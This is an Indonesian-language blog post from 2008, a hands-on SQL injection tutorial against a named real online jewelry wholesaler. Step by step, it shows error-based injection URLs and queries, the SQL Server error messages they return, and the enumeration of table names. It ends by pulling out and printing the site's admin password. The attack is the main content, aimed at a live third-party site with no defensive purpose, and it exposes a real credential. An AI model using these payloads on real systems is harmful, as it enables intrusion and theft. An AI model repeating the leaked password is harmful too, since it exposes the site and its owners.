ASP MsSQL Injection
versi c0li.m0de.0n
ex. http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11
debugging
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 "and 1="
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/wholesale/product.asp, line 83
kemudian injec dengan sql injection
Query nya : and 1=convert(int,(select top 1 table_name from nformation_schema.tables))--
sehingga urlnya menjadi
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from nformation_schema.tables))--
kemudia kita lihat eror yang keluar
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orders_whole' to a column of data type int.
/wholesale/product.asp, line 83
di sini kita sudah menemukan satu nama tabel yaitu orders_whole kita lanjutkan dengan mencari tabel selanjutnya
Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole')))--
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole')))--
erornya adalah:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'sysconstraints' to a column of data type int.
/wholesale/product.asp, line 83
dapat ;D , ahkirnya kita menemukan tabel sysconstraints mari kita cari tabel laen,,,
kita injec urlnya menjadi
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole','sysconstraints')))--
erornya
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'syssegments' to a column of data type int.
/wholesale/product.asp, line 83
dapet lagi 1 tabel, 'syssegments'
cari tabel lagi agh,,,
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('orders_whole','sysconstraints','syssegments')))--
erornya
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin' to a column of data type int.
/wholesale/product.asp, line 83
wih,,, dapet tabel admin :P
kalo dah sampe sini mah,, langsung ajah cari pass nya... :D
Querynya : and 1=convert(int,(select top 1 pwd from admin))--
http://www.indiansilverjewelryonline.com/wholesale/product.asp?catid=4&subcatid=11 and 1=convert(int,(select top 1 pwd from admin))--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'mummy ' to a column of data type int.
/wholesale/product.asp, line 83
dapet deh password adminya "mummy"
November 12, 2008
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment